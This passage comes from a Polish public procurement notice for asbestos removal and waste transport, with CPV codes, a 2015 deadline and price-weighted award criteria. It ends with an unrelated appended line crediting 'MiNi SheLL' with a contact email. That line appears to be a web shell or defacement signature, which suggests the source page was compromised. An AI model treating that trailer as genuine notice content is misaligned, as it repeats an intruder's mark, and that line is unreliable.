9. Wykonawca dostarcza Zamawiającemu potwierdzenie przyjęcia odpadu od właściciela nieruchomości, dokumenty potwierdzające przyjęcie odpadów na składowisko posiadające zezwolenie na przyjmowanie odpadów zawierających azbest - miejsce unieszkodliwienia (karta przekazania odpadu), protokół o którym mowa w ust. 8.

10. Zamówienie należy wykonać zgodnie z obowiązującymi w tym zakresie przepisami. 

11. CPV :  90600000-3  Usługi sprzątania oraz usługi sanitarne na obszarach miejskich lub wiejskich oraz usługi powiązane
                  90650000-8  Usługi usuwania azbestu 
                  90512000-9  Usługi transportu odpadów                 

12. Zamawiający nie przewiduje udzielenia zamówień uzupełniających..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.65.00.00-8, 90.60.00.00-3, 90.51.20.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.98</li>
<li>2. Termin realizacji - 0.02</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com